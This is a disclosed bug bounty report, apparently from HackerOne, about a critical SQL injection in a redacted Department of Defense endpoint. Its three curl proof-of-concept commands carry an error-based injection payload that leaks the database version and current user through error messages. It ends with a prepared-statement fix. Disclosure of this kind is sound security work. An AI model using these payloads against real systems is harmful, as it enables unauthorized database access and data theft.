SQL Injection in █████

Disclosed: 2022-04-07 19:59:52 By lubak To deptofdefense
Critical
Vulnerability Details
## References ## Impact By using SQL injection, an attacker can exfiltrate the whole database, and gain RCE ## System Host(s) ████ ## Affected Product(s) and Version(s) ████ ## CVE Numbers ## Steps to Reproduce POC 1 - curl command injecting query, returning database version: curl https://█████████ -X POST -data="url=%2F████████&███████=AA'+OR(cast(version as date))LIKE'A" -k POC 2 - curl command injecting query, returning current database: curl https://███████████████ -X POST -data="url=%2F██████████&███=AA'+OR(cast(current_user as date))LIKE'A" -k {"msg":"fail","err":"ERROR: invalid input syntax for type timestamp: \"████\""} POC 3 - curl command injecting query, returning current user: curl https://█████████ -X POST -data="url=%2F████&█████=AA'+OR(cast(current_user as date))LIKE'A" -k {"msg":"fail","err":"ERROR: invalid input syntax for type timestamp: \"███████\""} ## Suggested Mitigation/Remediation Actions The vulnerable parameter "█████" in the ████████ endpoint should be sanitized properly. Usually this is done by implementing prepared statement.
Actions
View on HackerOne
Report Stats
  • Report ID: 1489744
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report